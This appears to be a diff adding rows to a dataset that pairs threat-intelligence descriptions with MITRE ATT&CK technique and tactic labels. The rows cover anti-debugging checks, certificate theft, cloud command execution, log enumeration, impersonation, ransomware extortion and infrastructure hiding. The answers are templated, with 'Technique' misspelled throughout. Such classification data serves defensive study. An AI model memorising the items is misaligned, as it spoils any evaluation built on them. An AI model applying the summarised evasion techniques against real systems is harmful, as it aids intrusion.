+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Black Basta dropper can check system flags, CPU registers, CPU instructions, process timing, system libraries, and APIs to determine if a debugger is present.","Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can search for tools used in static analysis.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can use `IsDebuggerPresent` to detect whether a debugger is present on a victim.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate checks the BeingDebugged flag in the PEB structure during execution to identify if the malware is being debugged.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can detect debuggers by using functions such as `DebuggerIsAttached` and `DebuggerIsLogging`. DarkTortilla can also detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can search for debugging tools on a compromised host.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can check for debugging tools.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used `is_debugger_present` as part of its environmental checks.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses a function named is_debugging to perform anti-debugging logic. The function invokes sysctl checking the returned value of P_TRACED. ThiefQuest also calls ptrace with the PTRACE_DENY_ATTACH flag to prevent debugging.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses the plutil command to modify the LSUIElement, DFBundleDisplayName, and CFBundleIdentifier keys in the /Contents/Info.plist file to change how XCSSET is visible on the system.","Tecnique: T1647 Plist File Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can create malicious Lambda functions.,"Tecnique: T1648 Serverless Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.,"Tecnique: T1649 Steal or Forge Authentication Certificates, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can create and export various authentication certificates, including those associated with Azure AD joined/registered devices.","Tecnique: T1649 Steal or Forge Authentication Certificates, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.,"Tecnique: T1649 Steal or Forge Authentication Certificates, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used Azure Run Command and Azure Admin-on-Behalf-of (AOBO) to execute code on virtual machines.,"Tecnique: T1651 Cloud Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can execute commands on Azure virtual machines using the VM agent.,"Tecnique: T1651 Cloud Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can run commands on EC2 instances using AWS Systems Manager Run Command.,"Tecnique: T1651 Cloud Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT can enumerate device drivers located in the registry at `HKLM\Software\WBEM\WDM`.,"Tecnique: T1652 Device Driver Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec has a plugin to detect active drivers of some security products.,"Tecnique: T1652 Device Driver Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the BLOODMINE utility to parse and extract information from Pulse Secure Connect logs.,"Tecnique: T1654 Log Enumeration, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used `wevtutil.exe` and the PowerShell command `Get-EventLog security` to enumerate Windows logs to search for successful logons.,"Tecnique: T1654 Log Enumeration, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can collect CloudTrail event histories and CloudWatch logs.,"Tecnique: T1654 Log Enumeration, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls and text messages either to direct victims to a credential harvesting site or getting victims to run commercial remote monitoring and management (RMM) tools.","Tecnique: T1656 Impersonation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.","Tecnique: T1656 Impersonation, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has called victims' help desk and impersonated legitimate users with previously gathered information in order to gain access to privileged accounts.,"Tecnique: T1656 Impersonation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls and text messages either to direct victims to a credential harvesting site or getting victims to run commercial remote monitoring and management (RMM) tools.
+
+Scattered Spider utilized social engineering to compel IT help desk personnel to reset passwords and MFA tokens.","Tecnique: T1656 Impersonation, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira engages in double-extortion ransomware, exfiltrating files then encrypting them, in order to prompt victims to pay a ransom.","Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has maintained leak sites for exfiltrated data in attempt to extort victims into paying a ransom.,"Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has observed the victim's software and infrastructure over several months to understand the technical process of legitimate financial transactions, prior to attempting to conduct fraudulent transactions.","Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro targets organizations in a wide variety of sectors via the use of Mispadu banking trojan with the goal of financial theft.,"Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has deployed ransomware on compromised hosts for financial gain.,"Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SilverTerrier targets organizations in high technology, higher education, and manufacturing for business email compromise (BEC) campaigns with the goal of financial theft.","Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can deploy payloads capable of capturing credentials related to cryptocurrency wallets.,"Tecnique: T1657 Financial Theft, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware.","Tecnique: T1659 Content Injection, Tactic: TA0011 Command and Control TA0001 Initial Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Disco has achieved initial access and execution through content injection into DNS, HTTP, and SMB replies to targeted hosts that redirect them to download malicious files.","Tecnique: T1659 Content Injection, Tactic: TA0011 Command and Control TA0001 Initial Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 set the hostnames of their C2 infrastructure to match legitimate hostnames in the victim environment. They also used IP addresses originating from the same country as the victim for their VPN infrastructure.","Tecnique: T1665 Hide Infrastructure, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 uses compromised residential endpoints, typically within the same ISP IP address range, as proxies to hide the true source of C2 traffic.","Tecnique: T1665 Hide Infrastructure, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate command and control includes hard-coded domains in the malware masquerading as legitimate services such as Akamai CDN or Amazon Web Services.,"Tecnique: T1665 Hide Infrastructure, Tactic: TA0011 Command and Control"